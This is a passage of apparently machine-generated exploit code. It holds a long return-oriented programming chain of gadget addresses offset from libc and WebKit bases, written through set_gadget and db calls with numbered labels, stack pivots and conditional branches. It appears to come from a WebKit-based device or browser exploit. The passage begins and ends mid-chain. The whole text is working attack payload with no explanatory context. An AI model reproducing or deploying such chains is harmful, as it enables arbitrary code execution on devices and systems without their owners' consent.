libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+280152, //L5338
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L5338:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L5340:
db([64, 0]); // 0x40
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+280272, //L5343
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+280256, //L5341
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L5341:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L5343:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+280384, //L5344
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+280416, //L5346
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+280400, //L5345
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L5344:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L5345:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L5346:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+280584, //L5349
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+755774, //mov rax, rsi
libc_base+764760, //pop rsi
ropchain+280552, //L5347
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+280568, //L5348
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L5347:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L5348:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L5349:
db([0, 0]); // 0x0
set_gadget(webkit_base+1438842,); //pop rdx
db([0, 0]); // 0x0
set_gadgets([
webkit_base+24132920, //div rsi ; add rax, rcx
libc_base+428453, //mov rax, rdx
libc_base+764760, //pop rsi
ropchain+280768, //L5353
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+755774, //mov rax, rsi
libc_base+764760, //pop rsi
ropchain+280736, //L5351
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+280752, //L5352
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L5350:
db([24, 0]); // 0x18
set_gadget(webkit_base+3236123,); //pop r9
//L5351:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L5352:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L5353:
db([0, 0]); // 0x0
set_gadgets([
libc_base+848070, //shl rax, cl
libc_base+764760, //pop rsi
ropchain+280824, //L5355
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+144605 //pop rdi
]);
//L5355:
db([0, 0]); // 0x0
set_gadgets([
libc_base+478984, //sar edi, cl
libc_base+764760, //pop rsi
ropchain+280952, //L5357
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+280968, //L5358
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+280936, //L5356
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L5356:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L5357:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L5358:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+281048, //L5359
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+281064, //L5360
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L5359:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L5360:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+281152, //L5361
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+281168, //L5363
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L5361:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L5363:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L5364:
db([4294967255, 4294967295]); // -0x29
set_gadgets([
libc_base+501454, //add rax, rsi
webkit_base+1121481, //mov [rax], cl
libc_base+731401, //mov rax, r8
libc_base+764760 //pop rsi
]);
//L5366:
db([4294967255, 4294967295]); // -0x29
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+281328, //L5369
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+281312, //L5367
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L5367:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L5369:
db([0, 0]); // 0x0
set_gadgets([
libc_base+223440, //mov al, [rdi]
libc_base+764760, //pop rsi
ropchain+281488, //L5373
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+281456, //L5371
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+281472, //L5372
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L5370:
db([24, 0]); // 0x18
set_gadget(webkit_base+3236123,); //pop r9
//L5371:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L5372:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L5373:
db([0, 0]); // 0x0
set_gadgets([
libc_base+848070, //shl rax, cl
libc_base+764760, //pop rsi
ropchain+281544, //L5375
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+144605 //pop rdi
]);
//L5375:
db([0, 0]); // 0x0
set_gadgets([
libc_base+478984, //sar edi, cl
libc_base+764760, //pop rsi
ropchain+281672, //L5377
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+281688, //L5378
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+281656, //L5376
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L5376:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L5377:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L5378:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+281848, //L5382
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+281816, //L5380
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+281832, //L5381
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L5379:
db([24, 0]); // 0x18
set_gadget(webkit_base+3236123,); //pop r9
//L5380:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L5381:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L5382:
db([0, 0]); // 0x0
set_gadgets([
libc_base+848070, //shl rax, cl
libc_base+764760, //pop rsi
ropchain+281904, //L5384
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+144605 //pop rdi
]);
//L5384:
db([0, 0]); // 0x0
set_gadgets([
libc_base+478984, //sar edi, cl
libc_base+764760, //pop rsi
ropchain+282032, //L5386
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+282048, //L5387
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+282016, //L5385
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L5385:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L5386:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L5387:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+282128, //L5388
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+282144, //L5389
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L5388:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L5389:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+282240, //L5391
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+282224, //L5390
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L5390:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L5391:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+282320, //L5392
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+3236123 //pop r9
]);
//L5392:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L5393:
db([10, 0]); // 0xa
set_gadget(libc_base+144605,); //pop rdi
//L5394:
db([10, 0]); // 0xa
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+282464, //L5395
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+282496, //L5397
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+282480, //L5396
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L5395:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L5396:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L5397:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
webkit_base+6378709, //cmp rax, rcx ; sete al
webkit_base+5168252, //setl al
libc_base+226597, //movzx eax, al
libc_base+764760, //pop rsi
ropchain+282672, //L5399
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+282688, //L5400
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+282656, //L5398
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+3236123 //pop r9
]);
//L5398:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L5399:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L5400:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+282800, //L5402
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+282848, //L5405
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+282816, //L5403
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+3236123 //pop r9
]);
//L5402:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L5403:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L5404:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L5405:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+21212296, //cmp rax, rsi ; sete al
libc_base+226597, //movzx eax, al
webkit_base+5507491, //shl rax, 3
libc_base+764760, //pop rsi
ropchain+282960, //L5406+8
libc_base+501454, //add rax, rsi
libc_base+501611, //mov rax, [rax]
libc_base+764760, //pop rsi
ropchain+282952, //L5406
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+782311 //pop rsp
]);
//L5406:
db([0, 0]); // 0x0
set_gadgets([
ropchain+282976, //L5406+24
ropchain+284112, //L5401
libc_base+759608 //pop rax
]);
//L5407:
db([48, 0]); // 0x30
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+283064, //L5408
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L5408:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L5410:
db([4294967255, 4294967295]); // -0x29
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+283184, //L5413
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+283168, //L5411
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L5411:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L5413:
db([0, 0]); // 0x0
set_gadgets([
libc_base+223440, //mov al, [rdi]
libc_base+764760, //pop rsi
ropchain+283344, //L5417
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+283312, //L5415
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+283328, //L5416
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L5414:
db([24, 0]); // 0x18
set_gadget(webkit_base+3236123,); //pop r9
//L5415:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L5416:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L5417:
db([0, 0]); // 0x0
set_gadgets([
libc_base+848070, //shl rax, cl
libc_base+764760, //pop rsi
ropchain+283400, //L5419
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+144605 //pop rdi
]);
//L5419:
db([0, 0]); // 0x0
set_gadgets([
libc_base+478984, //sar edi, cl
libc_base+764760, //pop rsi
ropchain+283528, //L5421
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+283544, //L5422
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+283512, //L5420
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L5420:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L5421:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L5422:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+283704, //L5426
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+283672, //L5424
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+283688, //L5425
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L5423:
db([24, 0]); // 0x18
set_gadget(webkit_base+3236123,); //pop r9
//L5424:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L5425:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L5426:
db([0, 0]); // 0x0
set_gadgets([
libc_base+848070, //shl rax, cl
libc_base+764760, //pop rsi
ropchain+283760, //L5428
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+144605 //pop rdi
]);
//L5428:
db([0, 0]); // 0x0
set_gadgets([
libc_base+478984, //sar edi, cl
libc_base+764760, //pop rsi
ropchain+283888, //L5430
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+283904, //L5431
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+283872, //L5429
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L5429:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L5430:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L5431:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+284016, //L5432
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+284048, //L5434
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+284032, //L5433
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L5432:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L5433:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L5434:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+755660, //add rax, rcx
libc_base+782311, //pop rsp
ropchain+286504, //L5435
//L5401:
libc_base+764760, //pop rsi
ropchain+284152, //L5436
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L5436:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L5438:
db([88, 0]); // 0x58
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+284272, //L5441
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+284256, //L5439
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L5439:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L5441:
db([0, 0]); // 0x0
set_gadgets([
libc_base+224145, //mov eax, [rdi]
libc_base+764760, //pop rsi
ropchain+284448, //L5444
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+284464, //L5445
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+284416, //L5442
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+284432, //L5443
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L5442:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L5443:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L5444:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L5445:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+284560, //L5447
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+284544, //L5446
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L5446:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L5447:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+759608 //pop rax
]);
//L5448:
db([1, 0]); // 0x1
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+759608 //pop rax
]);
//L5449:
db([5, 0]); // 0x5
set_gadget(libc_base+763368,); //pop rcx
//L5450:
db([5, 0]); // 0x5
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+848070, //shl rax, cl
libc_base+764760, //pop rsi
ropchain+284760, //L5452
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L5452:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+284816, //L5453
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L5453:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
webkit_base+14664103, //and rax, rcx
libc_base+764760, //pop rsi
ropchain+284952, //L5457
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+284936, //L5456
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L5455:
db([32, 0]); // 0x20
set_gadget(webkit_base+3236123,); //pop r9
//L5456:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L5457:
db([0, 0]); // 0x0
set_gadgets([
libc_base+848070, //shl rax, cl
libc_base+848080, //shr rax, cl
libc_base+764760, //pop rsi
ropchain+285088, //L5460
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+285120, //L5462
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+285072, //L5459
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L5459:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L5460:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L5461:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L5462:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+21212296, //cmp rax, rsi ; sete al
libc_base+226597, //movzx eax, al
webkit_base+5507491, //shl rax, 3
libc_base+764760, //pop rsi
ropchain+285232, //L5463+8
libc_base+501454, //add rax, rsi
libc_base+501611, //mov rax, [rax]
libc_base+764760, //pop rsi
ropchain+285224, //L5463
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+782311 //pop rsp
]);
//L5463:
db([0, 0]); // 0x0
set_gadgets([
ropchain+285248, //L5463+24
ropchain+285280, //L5458
libc_base+759608 //pop rax
]);
//L5465:
db([65, 0]); // 0x41
set_gadgets([
libc_base+782311, //pop rsp
ropchain+285296, //L5464
//L5458:
libc_base+759608 //pop rax
]);
//L5466:
db([97, 0]); // 0x61
//L5464:
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+285368, //L5467
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L5467:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L5469:
db([4294967255, 4294967295]); // -0x29
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+285488, //L5472
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+285472, //L5470
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L5470:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L5472:
db([0, 0]); // 0x0
set_gadgets([
libc_base+223440, //mov al, [rdi]
libc_base+764760, //pop rsi
ropchain+285648, //L5476
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+285616, //L5474
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+285632, //L5475
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L5473:
db([24, 0]); // 0x18
set_gadget(webkit_base+3236123,); //pop r9
//L5474:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L5475:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L5476:
db([0, 0]); // 0x0
set_gadgets([
libc_base+848070, //shl rax, cl
libc_base+764760, //pop rsi
ropchain+285704, //L5478
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+144605 //pop rdi
]);
//L5478:
db([0, 0]); // 0x0
set_gadgets([
libc_base+478984, //sar edi, cl
libc_base+764760, //pop rsi
ropchain+285832, //L5480
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+285848, //L5481
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+285816, //L5479
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L5479:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L5480:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L5481:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+286008, //L5485
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+285976, //L5483
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+285992, //L5484
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L5482:
db([24, 0]); // 0x18
set_gadget(webkit_base+3236123,); //pop r9
//L5483:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L5484:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L5485:
db([0, 0]); // 0x0
set_gadgets([
libc_base+848070, //shl rax, cl
libc_base+764760, //pop rsi
ropchain+286064, //L5487
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+144605 //pop rdi
]);
//L5487:
db([0, 0]); // 0x0
set_gadgets([
libc_base+478984, //sar edi, cl
libc_base+764760, //pop rsi
ropchain+286192, //L5489
webkit_base+660161, //mov [rsi], rax ; mov al, 1
